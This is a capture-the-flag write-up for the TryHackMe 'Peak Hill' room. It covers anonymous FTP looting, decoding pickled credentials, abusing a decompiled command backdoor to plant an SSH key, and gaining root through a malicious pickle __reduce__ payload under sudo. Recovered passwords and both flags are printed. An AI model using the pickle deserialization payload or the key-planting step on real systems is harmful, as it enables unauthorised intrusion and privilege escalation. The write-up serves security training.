From aldeid
Jump to navigation Jump to search

Peak Hill

Exercises in Python library abuse and some exploitation techniques

Deploy and compromise the machine!

Make sure you’re connected to TryHackMe’s network.


Services discovery

20/tcp   closed ftp-data
21/tcp   open   ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp            17 May 15 18:37 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open   ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 04:d5:75:9d:c1:40:51:37:73:4c:42:30:38:b8:d6:df (RSA)
|   256 7f:95:1a:d7:59:2f:19:06:ea:c1:55:ec:58:35:0c:05 (ECDSA)
|_  256 a5:15:36:92:1c:aa:59:9b:8a:d8:ea:13:c9:c0:ff:b6 (ED25519)
7321/tcp open   swx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     Username: Password:
|   NULL: 
|_    Username:

Port 21 (anonymous FTP only)

$ ftp
Connected to (
220 (vsFTPd 3.0.3)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (10,10,19,17,159,63).
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 May 15 18:37 .
drwxr-xr-x    2 ftp      ftp          4096 May 15 18:37 ..
-rw-r--r--    1 ftp      ftp          7048 May 15 18:37 .creds
-rw-r--r--    1 ftp      ftp            17 May 15 18:37 test.txt
226 Directory send OK.
ftp> get .creds
local: .creds remote: .creds
227 Entering Passive Mode (10,10,19,17,49,255).
150 Opening BINARY mode data connection for .creds (7048 bytes).
226 Transfer complete.
7048 bytes received in 0.00345 secs (2043.49 Kbytes/sec)
ftp> get test.txt
local: test.txt remote: test.txt
227 Entering Passive Mode (10,10,19,17,132,154).
150 Opening BINARY mode data connection for test.txt (17 bytes).
226 Transfer complete.
17 bytes received in 0.000884 secs (19.23 Kbytes/sec)
ftp> quit
221 Goodbye.
$ cat test.txt 
vsftpd test file
$ cat .creds

Port 7321

$ nc 7321
Username: admin
Password: admin
Wrong credentials!

#1 - What is the user flag?

Decode pickle message

I’ve written a python script to decode the binary string gathered in the .creds.txt file (FTP):

#!/usr/bin/env python3

with open('creds_decoded.txt', 'w') as credsout, open('creds.txt', 'r') as credsin:
    r =
    # chunks of 8
    b = ' '.join([r[i:i+8] for i in range(0, len(r), 8)])
    # decode
    credsout.write(''.join([chr(int(c, 2)) for c in b.split(' ')]))

Run it to get the following decoded text:

$ cat creds_decoded.txt 
ssh_pass15qXuqqX    ssh_user1qXhqqX
ssh_pass25qXrq  X
  X ssh_pass7q
qX      ssh_user0qXgqqX
ssh_pass26qXlqqX    ssh_pass5qX3qqX ssh_pass1qX1qq�X
[email protected]    ssh_user2q Xeq!q"X  ssh_user5q#Xiq$q%X
ssh_pass27q(Xdq)q*X ssh_pass3q+Xkq,q-X
ssh_pass19q.Xtq/q0X ssh_pass6q1Xsq2q3X  ssh_pass9q4hq5X
ssh_pass21q9hq:X    ssh_pass4q;hq<X
ssh_pass14q=X0q>q?X [email protected]  ssh_pass2qCXcqDqEX
ssh_pass16qHhAqIX   ssh_pass8qJhqKX
ssh_pass24qNh>qOX   ssh_user3qPqQX  ssh_user4qRh,qSX

The file is actually a pickled python file (

“The pickle module implements binary protocols for serializing and de-serializing a Python object structure. “Pickling” is the process whereby a Python object hierarchy is converted into a byte stream, and “unpickling” is the inverse operation, whereby a byte stream (from a binary file or bytes-like object) is converted back into an object hierarchy. Pickling (and unpickling) is alternatively known as “serialization”, “marshalling,” 1 or “flattening”; however, to avoid confusion, the terms used here are “pickling” and “unpickling”."

Let’s decode the binary string with CyberChef first and get a creds.dat file:


Now, let’s decode the file:

#!/usr/bin/env python3

import pickle
import re

with open('creds.dat', 'rb') as f:
    data = pickle.load(f)
    sshuser = []
    sshpass = []

    for i in data:
        pos = int(re.findall('\d+', i[0])[0])
        if 'ssh_user' in i[0]:
            sshuser.append([pos, i[1]])
            sshpass.append([pos, i[1]])

    print("SSH user: {}".format(''.join([i[1] for i in sshuser])))
    print("SSH pass: {}".format(''.join([i[1] for i in sshpass])))

Here is the script output:

$ python 
SSH user: gherkin
SSH pass: [email protected][email protected]_th3_w0rld

SSH connection

Now, let’s use the credentials to connect to the SSH service.

We have a compiled python script in our home. Let’s get it locally and uncompile it with uncompyle6:

$ uncompyle6 cmd_service.pyc 
# uncompyle6 version 3.7.0
# Python bytecode 3.8 (3413)
# Decompiled from: Python 3.8.3 (default, May 15 2020, 00:00:00) 
# [GCC 10.1.1 20200507 (Red Hat 10.1.1-1)]
# Embedded file name: ./
# Compiled at: 2020-05-14 19:55:16
# Size of source mod 2**32: 2140 bytes
from Crypto.Util.number import bytes_to_long, long_to_bytes
import sys, textwrap, socketserver, string, readline, threading
from time import *
import getpass, os, subprocess
username = long_to_bytes(1684630636)
password = long_to_bytes(2457564920124666544827225107428488864802762356)

class Service(socketserver.BaseRequestHandler):

    def ask_creds(self):
        username_input = self.receive(b'Username: ').strip()
        password_input = self.receive(b'Password: ').strip()
        print(username_input, password_input)
        if username_input == username:
            if password_input == password:
                return True
        return False

    def handle(self):
        loggedin = self.ask_creds()
        if not loggedin:
            self.send(b'Wrong credentials!')
            return None
        self.send(b'Successfully logged in!')
        while True:
            command = self.receive(b'Cmd: ')
            p = subprocess.Popen(command,
              shell=True, stdout=(subprocess.PIPE), stderr=(subprocess.PIPE))

    def send(self, string, newline=True):
        if newline:
            string = string + b'\n'

    def receive(self, prompt=b'> '):
        self.send(prompt, newline=False)
        return self.request.recv(4096).strip()

class ThreadedService(socketserver.ThreadingMixIn, socketserver.TCPServer, socketserver.DatagramRequestHandler):

def main():
    print('Starting server...')
    port = 7321
    host = ''
    service = Service
    server = ThreadedService((host, port), service)
    server.allow_reuse_address = True
    server_thread = threading.Thread(target=(server.serve_forever))
    server_thread.daemon = True
    print('Server started on ' + str(server.server_address) + '!')
    while True:

if __name__ == '__main__':
# okay decompiling cmd_service.pyc
$ python
>>> from Crypto.Util.number import long_to_bytes
>>> print(long_to_bytes(1684630636))
>>> print(long_to_bytes(2457564920124666544827225107428488864802762356))
b'[email protected]_d1ll_m0m3nt'
$ nc 7321
Username: dill
Password: [email protected]_d1ll_m0m3nt
Successfully logged in!
Cmd: cat /home/dill/user.txt

User flag: f1e13335c47306e193212c98fc07b6a0

#2 - What is the root flag?

Maintain access

Unfortunately, these credentials didn’t work on the server directly (dill’s password is different than the one hardcoded in the shell).

Let’s add our SSH key to dill’s .ssh directory to be able to connect via SSH directly. First generate a public key and a private key on our own machine:

$ ssh-keygen -t rsa
$ cat 
ssh-rsa AAAAB3Nz[REDACTED]7YP7lhvLfM= [email protected]

Now let’s add this string to dill’s .ssh directory using the backdoor:

Cmd: echo "ssh-rsa AAAAB3Nz[REDACTED]71CiH7YP7lhvLfM= [email protected]" >> /home/dill/.ssh/authorized_keys

Now, we can connect directly in SSH without password.

$ ssh [email protected]
[email protected]:~$ whoami

Let’s check our privileges

[email protected]:~$ sudo -l
Matching Defaults entries for dill on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dill may run the following commands on ubuntu-xenial:
    (ALL : ALL) NOPASSWD: /opt/peak_hill_farm/peak_hill_farm

This program needs to be run as root:

[email protected]:/opt/peak_hill_farm$ ./peak_hill_farm 
[31780] Cannot open self /opt/peak_hill_farm/peak_hill_farm or archive /opt/peak_hill_farm/peak_hill_farm.pkg

There are many files in /opt/peak_hill_farm/:

[email protected]:/opt/peak_hill_farm$ ll
total 11404
drwxr-xr-x 2 root root    4096 May 15 18:38 .
drwxr-xr-x 3 root root    4096 May 20 21:56 ..
-rwxr-x--- 1 root root  788413 May 15 18:38
-rwxr-x--- 1 root root   22000 Apr 17 15:25
-rwxr-x--- 1 root root  149880 Apr 17 15:25
-rwxr-x--- 1 root root  158104 Apr 17 15:25
-rwxr-x--- 1 root root   31128 Apr 17 15:25
-rwxr-x--- 1 root root  268664 Apr 17 15:25
-rwxr-x--- 1 root root  137592 Apr 17 15:25
-rwxr-x--- 1 root root  113016 Apr 17 15:25
-rwxr-x--- 1 root root  156624 Apr 17 15:25
-rwxr-x--- 1 root root   29488 Apr 17 15:25
-rwxr-x--- 1 root root   66800 Jul  4  2019
-rwxr-x--- 1 root root 2365952 Feb 27  2019
-rwxr-x--- 1 root root  166032 Sep 12  2019
-rwxr-x--- 1 root root  137400 Feb 12  2014
-rwxr-x--- 1 root root 4547880 Apr 17 15:25
-rwxr-x--- 1 root root  282392 Feb  4  2016
-rwxr-x--- 1 root root  428384 Feb 27  2019
-rwxr-x--- 1 root root  167240 Feb 19  2016
-rwxr-x--- 1 root root  104864 Jan 21 19:13
-rwxr-x--- 1 root root   37616 Apr 17 15:25
-rwxr-x--- 1 root root   44144 Apr 17 15:25
-rwxr-x--- 1 root root    6504 Apr 17 15:25
-rwxr-x--x 1 root root 1218056 May 15 18:38 peak_hill_farm
-rwxr-x--- 1 root root   31688 Apr 17 15:25
-rwxr-x--- 1 root root   15432 Apr 17 15:25
-rwxr-x--- 1 root root  118744 Apr 17 15:25
-rwxr-x--- 1 root root   25032 Apr 17 15:25

Let’s run the peak_hill_farm executable. It asks for a question (“to grow”). Obviously, as I provided the wrong answer, I have an error message in return.

[email protected]:/opt/peak_hill_farm$ sudo ./peak_hill_farm 
Peak Hill Farm 1.0 - Grow something on the Peak Hill Farm!

to grow: oops
this not grow did not grow on the Peak Hill Farm! :(

By chance, I tried to provide “pickles” as answer just for fun and had a different message:

[email protected]:/opt/peak_hill_farm$ sudo ./peak_hill_farm 
Peak Hill Farm 1.0 - Grow something on the Peak Hill Farm!

to grow: pickles
failed to decode base64
[email protected]:/opt/peak_hill_farm$ echo -n "pickles" | base64
[email protected]:/opt/peak_hill_farm$ sudo ./peak_hill_farm 
Peak Hill Farm 1.0 - Grow something on the Peak Hill Farm!

to grow: cGlja2xlcw==
this not grow did not grow on the Peak Hill Farm! :(

Becoming root

This room is about python, pickle and exploitation. Let’s search on the Internet for an exploit that allows privilege escalation. I found this interesting document (, especially on page 21. I tried the exploit for the id command which executed on the server. Now, let’s modify the command to get a shell:

[email protected]:/opt/peak_hill_farm$ python3
Python 3.5.2 (default, Apr 16 2020, 17:47:17) 
[GCC 5.4.0 20160609] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> import pickle
>>> import base64
>>> class evil_object(object):
...     def __reduce__(self):
...         return (os.system, ('/bin/bash',))
>>> x = evil_object()
>>> holdit = pickle.dumps(x)
>>> base64.b64encode(holdit)

Now that we have our base64 payload, let’s use it:

[email protected]:/opt/peak_hill_farm$ sudo ./peak_hill_farm 
Peak Hill Farm 1.0 - Grow something on the Peak Hill Farm!

to grow: gANjcG9zaXgKc3lzdGVtCnEAWAkAAAAvYmluL2Jhc2hxAYVxAlJxAy4=
[email protected]:/opt/peak_hill_farm# whoami
[email protected]:/opt/peak_hill_farm# 

Another trick to read the root flag:

[email protected]:/opt/peak_hill_farm# cd /root/
[email protected]:/root# ls /root/
[email protected]:/root# cat root.txt
cat: root.txt: No such file or directory
[email protected]:/root# find /root/ -name "*root.txt*"
/root/ root.txt 
[email protected]:/root# find /root/ -name "*root.txt*" -exec cat {} \;

Root flag: e88f0a01135c05cf0912cf4bc335ee28